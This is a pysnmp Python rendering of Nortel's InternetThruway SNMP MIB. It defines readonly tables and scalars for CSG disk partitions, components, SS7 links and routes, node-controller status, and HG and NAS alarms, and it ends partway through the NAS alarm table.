MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, ObjectIdentity, Counter64, Gauge32, NotificationType, Bits, NotificationType, MibIdentifier, TimeTicks, enterprises, ModuleIdentity, iso, Integer32, Unsigned32, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "ObjectIdentity", "Counter64", "Gauge32", "NotificationType", "Bits", "NotificationType", "MibIdentifier", "TimeTicks", "enterprises", "ModuleIdentity", "iso", "Integer32", "Unsigned32", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
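# OID registrations below build out the nortel(562) -> dialaccess(14) -> csg(2) subtree that the rest of this MIB hangs off.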
nortel = MibIdentifier((1, 3, 6, 1, 4, 1, 562))
dialaccess = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14))
csg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2))
system = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 1))
components = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 2))
traps = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 3))
alarms = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 4))
ncServer = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 5))
ss7 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 6))
omData = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7))
disk = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1))
linkOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1))
maintenanceOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2))
callOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3))
trunkGroupOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4))
phoneNumberOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5))
systemOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6))
nasOMs = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7))
class TimeString(DisplayString):
pass
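# Disk partition table: one conceptual row per CSG disk partition, carrying usage figures plus the partition-space alarm state and timestamp.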
partitionTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1), )
if mibBuilder.loadTexts: partitionTable.setStatus('mandatory')
if mibBuilder.loadTexts: partitionTable.setDescription('The PartitionTable contains information about each disk partition on the CSG')
partitionTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "partitionIndex"))
if mibBuilder.loadTexts: partitionTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: partitionTableEntry.setDescription('An entry in the PartitionTable. Indexed by partitionIndex')
class PartitionSpaceStatus(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("spaceAlarmOff", 1), ("spaceAlarmOn", 2))
partitionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4)))
if mibBuilder.loadTexts: partitionIndex.setStatus('mandatory')
if mibBuilder.loadTexts: partitionIndex.setDescription('Identifies partition number.')
partitionName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionName.setStatus('mandatory')
if mibBuilder.loadTexts: partitionName.setDescription('Identifies partition name.')
partitionPercentFull = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionPercentFull.setStatus('mandatory')
if mibBuilder.loadTexts: partitionPercentFull.setDescription('Indicates (in Percent) how full the disk is.')
partitionMegsFree = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionMegsFree.setStatus('mandatory')
if mibBuilder.loadTexts: partitionMegsFree.setDescription('Indicates how many Megabytes are free on the partition.')
partitionSpaceStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 5), PartitionSpaceStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceStatus.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceStatus.setDescription('Indicates if there is currently a space alarm in progress.')
partitionSpaceKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceKey.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceKey.setDescription('Unique indicator for the partition space alarm.')
partitionSpaceTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceTimeStamp.setDescription('Indicates the time of the last partitionSpaceStatus transition.')
componentTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10), )
if mibBuilder.loadTexts: componentTable.setStatus('mandatory')
if mibBuilder.loadTexts: componentTable.setDescription('The ComponentTable contains information about all the Components that should be running on the CSG.')
componentTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1), ).setIndexNames((0, "InternetThruway-MIB", "componentIndex"))
if mibBuilder.loadTexts: componentTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: componentTableEntry.setDescription('An entry in the ComponentTable. componentTable entries are indexed by componentIndex, which is an integer. ')
class ComponentIndex(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))
namedValues = NamedValues(("oolsproxy", 1), ("climan", 2), ("arm", 3), ("sem", 4), ("hgm", 5), ("survman", 6), ("ss7scm", 7), ("ss7opm", 8), ("ss7cheni", 9))
class ComponentSysmanState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("inProvisionedState", 1), ("notInProvisionedState", 2), ("unknown", 3))
componentIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 1), ComponentIndex())
if mibBuilder.loadTexts: componentIndex.setStatus('mandatory')
if mibBuilder.loadTexts: componentIndex.setDescription('Identifies the component entry with an enumerated list.')
componentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: componentName.setStatus('mandatory')
if mibBuilder.loadTexts: componentName.setDescription('Identifies component name.')
compSecsInCurrentState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compSecsInCurrentState.setStatus('mandatory')
if mibBuilder.loadTexts: compSecsInCurrentState.setDescription('Indicates how many seconds a component has been running in its current state. ')
compProvStateStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 4), ComponentSysmanState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateStatus.setDescription('Indicates the current state of the particular CSG component. The states are one of the following: inProvisionedState(1), notInProvisionedState(2), unknown(3)')
compProvStateKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateKey.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateKey.setDescription('Unique indicator for the prov state alarm.')
compProvStateTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateTimeStamp.setDescription('Indicates the time of the last state transition.')
compDebugStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugStatus.setDescription('Shows if the component is running with debug on.')
compDebugKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugKey.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugKey.setDescription('Unique indicator for the debug state.')
compDebugTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 9), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugTimeStamp.setDescription('Indicates the time of the last debug transition.')
compRestartStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartStatus.setDescription('Shows if the component has had multiple restarts recently.')
compRestartKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartKey.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartKey.setDescription('Unique indicator for the multi-restart of components.')
compRestartTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 12), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartTimeStamp.setDescription('Indicates the time of the last restart flagging.')
linksetTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1), )
if mibBuilder.loadTexts: linksetTable.setStatus('mandatory')
if mibBuilder.loadTexts: linksetTable.setDescription('The linksetTable contains information about all the linksets on the CSG.')
linksetTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"))
if mibBuilder.loadTexts: linksetTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linksetTableEntry.setDescription('An entry in the linksetTable. Entries in the linkset table are indexed by linksetIndex, which is an integer.')
class LinksetState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("available", 1), ("unAvailable", 2))
linksetIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: linksetIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linksetIndex.setDescription("Identifies the n'th position in the table.")
linksetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetId.setStatus('mandatory')
if mibBuilder.loadTexts: linksetId.setDescription('The id of the linkset to be used as index.')
linksetAdjPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetAdjPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: linksetAdjPointcode.setDescription('The adjacent pointcode of the linkset.')
linksetState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 4), LinksetState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetState.setStatus('mandatory')
if mibBuilder.loadTexts: linksetState.setDescription('The state of the linkset.')
linkTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2), )
if mibBuilder.loadTexts: linkTable.setStatus('mandatory')
if mibBuilder.loadTexts: linkTable.setDescription('The linkTable contains information about the links in a given linkset on the CSG.')
linkTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"), (0, "InternetThruway-MIB", "linkIndex"))
if mibBuilder.loadTexts: linkTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linkTableEntry.setDescription('An entry in the linkTable. Entries in the link table table are indexed by linksetIndex and linkIndex, which are both integers.')
class LinkState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("available", 1), ("unAvailable", 2))
class LinkInhibitionState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("unInhibited", 1), ("localInhibited", 2), ("remoteInhibited", 3), ("localRemoteInhibited", 4))
class LinkCongestionState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("notCongested", 1), ("congested", 2))
class LinkAlignmentState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("aligned", 1), ("notAligned", 2))
linkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: linkIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linkIndex.setDescription("Identifies the n'th position in the table.")
linkId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkId.setStatus('mandatory')
if mibBuilder.loadTexts: linkId.setDescription('The id of the link.')
linkHostname = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkHostname.setStatus('mandatory')
if mibBuilder.loadTexts: linkHostname.setDescription('The hostname of the CSG to which this link is attached.')
linkCardDeviceName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCardDeviceName.setStatus('mandatory')
if mibBuilder.loadTexts: linkCardDeviceName.setDescription('The device name of the card upon which this link is hosted.')
linkState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 5), LinkState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkState.setStatus('mandatory')
if mibBuilder.loadTexts: linkState.setDescription('The state of the link.')
linkInhibitionState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 6), LinkInhibitionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkInhibitionState.setStatus('mandatory')
if mibBuilder.loadTexts: linkInhibitionState.setDescription('The inhibition status of the link.')
linkCongestionState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 7), LinkCongestionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCongestionState.setStatus('mandatory')
if mibBuilder.loadTexts: linkCongestionState.setDescription('The congestion status of the link.')
linkAlignmentState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 8), LinkAlignmentState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignmentState.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignmentState.setDescription('The alignment status of the link.')
linkNumMSUReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUReceived.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUReceived.setDescription("This object supplies the number of MSU's received by the link.")
linkNumMSUDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUDiscarded.setDescription("This object supplies the number of received MSU's discarded by the link.")
linkNumMSUTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUTransmitted.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUTransmitted.setDescription("This object supplies the number of MSU's transmitted by the link.")
linkNumSIFReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumSIFReceived.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumSIFReceived.setDescription('This object supplies the number of SIF and SIO octets received by the link.')
linkNumSIFTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumSIFTransmitted.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumSIFTransmitted.setDescription('This object supplies the number of SIF and SIO octets transmitted by the link.')
linkNumAutoChangeovers = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumAutoChangeovers.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumAutoChangeovers.setDescription('This object supplies the number of automatic changeovers undergone by the link.')
linkNumUnexpectedMsgs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumUnexpectedMsgs.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumUnexpectedMsgs.setDescription('This object supplies the number of unexpected messages received by the link.')
routeTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3), )
if mibBuilder.loadTexts: routeTable.setStatus('mandatory')
if mibBuilder.loadTexts: routeTable.setDescription('The routeTable contains information about the routes provisioned in the CSG complex.')
routeTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1), ).setIndexNames((0, "InternetThruway-MIB", "routeIndex"))
if mibBuilder.loadTexts: routeTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: routeTableEntry.setDescription('An entry in the routeTable. Entries in the route table are indexed by routeIndex, which is an integer.')
class RouteState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("accessible", 1), ("inaccessible", 2), ("restricted", 3))
routeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 1), Integer32())
if mibBuilder.loadTexts: routeIndex.setStatus('mandatory')
if mibBuilder.loadTexts: routeIndex.setDescription("Identifies the n'th position in the table.")
routeId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeId.setStatus('mandatory')
if mibBuilder.loadTexts: routeId.setDescription('The unique identifier of the route.')
routeDestPointCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeDestPointCode.setStatus('mandatory')
if mibBuilder.loadTexts: routeDestPointCode.setDescription('The destination point code associated with this route.')
routeState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 4), RouteState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeState.setStatus('mandatory')
if mibBuilder.loadTexts: routeState.setDescription('The current state of the route.')
routeRank = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeRank.setStatus('mandatory')
if mibBuilder.loadTexts: routeRank.setDescription('Rank assigned to this route.')
routeLinksetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeLinksetId.setStatus('mandatory')
if mibBuilder.loadTexts: routeLinksetId.setDescription('The linkset associated with this route.')
destinationTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4), )
if mibBuilder.loadTexts: destinationTable.setStatus('mandatory')
if mibBuilder.loadTexts: destinationTable.setDescription('The destinationTable contains information about the destinations provisioned in the CSG complex.')
destinationTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1), ).setIndexNames((0, "InternetThruway-MIB", "destIndex"))
if mibBuilder.loadTexts: destinationTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: destinationTableEntry.setDescription('An entry in the destinationTable. Entries in the destination table are indexed by destIndex, which is an integer.')
class DestinationState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("accessible", 1), ("inaccessible", 2), ("restricted", 3))
destIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 1), Integer32())
if mibBuilder.loadTexts: destIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destIndex.setDescription("Identifies the n'th position in the table.")
destPointCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destPointCode.setStatus('mandatory')
if mibBuilder.loadTexts: destPointCode.setDescription('The destination point code of this destination.')
destState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 3), DestinationState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destState.setStatus('mandatory')
if mibBuilder.loadTexts: destState.setDescription('The current state of the destination.')
destRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destRuleId.setStatus('mandatory')
if mibBuilder.loadTexts: destRuleId.setDescription('Rule Identifier (for the routing table to be used) for this destination.')
ncServerId = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncServerId.setStatus('mandatory')
if mibBuilder.loadTexts: ncServerId.setDescription(' The ServerId attribute value of the node.')
ncServerName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncServerName.setStatus('mandatory')
if mibBuilder.loadTexts: ncServerName.setDescription(' The ServerName attribute value of the node.')
ncHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncHostName.setStatus('mandatory')
if mibBuilder.loadTexts: ncHostName.setDescription(' The HostName attribute value of the node.')
ncEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: ncEthernetName.setDescription(' The EthernetName attribute value of the node.')
ncEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: ncEthernetIP.setDescription(' The EthernetIP attribute value of the node.')
ncClusterName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncClusterName.setStatus('mandatory')
if mibBuilder.loadTexts: ncClusterName.setDescription(' The ClusterName attribute value of the node.')
ncClusterIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncClusterIP.setStatus('mandatory')
if mibBuilder.loadTexts: ncClusterIP.setDescription(' The ClusterIP attribute value of the node.')
ncOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: ncOperationalState.setDescription(' The OperationalState of the node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
ncStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: ncStandbyState.setDescription(' The StandbyState attribute value of the node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
ncAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: ncAvailabilityState.setDescription(' The AvailabilityState attribute value of the node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
ncSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 12), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncSoftwareVersion.setStatus('mandatory')
if mibBuilder.loadTexts: ncSoftwareVersion.setDescription(' The SoftwareVersion attribute value of the node.')
class UpgradeInProgress(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2)
ncUpgradeInProgress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 13), UpgradeInProgress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncUpgradeInProgress.setStatus('mandatory')
if mibBuilder.loadTexts: ncUpgradeInProgress.setDescription(' The UpgradeInProgress attribute value of the node. Possible values are: 0 = UNKNOWN, 1 = ACTIVE, 2 = INACTIVE ')
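# Alarm tables: one table per alarm category (HG, NAS, SS7 link failure/congestion, ISUP, MTP2 trunk, MTP3, linkset, destination), each row carrying a unique alarm key, source IP/name, and timestamp.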
hgAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10), )
if mibBuilder.loadTexts: hgAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTable.setDescription('The HgAlarmTable contains information about all the current HG alarms')
hgAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1), ).setIndexNames((0, "InternetThruway-MIB", "hgIndex"))
if mibBuilder.loadTexts: hgAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTableEntry.setDescription('An entry in the HgAlarmTable. HgAlarmTable entries are indexed by componentIndex, which is an integer.')
hgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 1), Integer32())
if mibBuilder.loadTexts: hgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: hgIndex.setDescription("Identifies the n'th position in the table.")
hgName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgName.setStatus('mandatory')
if mibBuilder.loadTexts: hgName.setDescription('The Home gateway to be used as index')
hgKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgKey.setStatus('mandatory')
if mibBuilder.loadTexts: hgKey.setDescription('Unique identifier for the HgFailure alarm ')
hgAlarmTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgAlarmTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTimeStamp.setDescription('Indicates the time of the HG Alarm.')
hgIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: hgIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
nasAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11), )
if mibBuilder.loadTexts: nasAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTable.setDescription('The NasAlarmTable contains information about all the current NAS alarms')
nasAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1), ).setIndexNames((0, "InternetThruway-MIB", "nasIndex"))
if mibBuilder.loadTexts: nasAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTableEntry.setDescription('An entry in the NasAlarmTable. NasAlarmTable entries are indexed by nasIndex, which is an integer.')
nasIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 1), Integer32())
if mibBuilder.loadTexts: nasIndex.setStatus('mandatory')
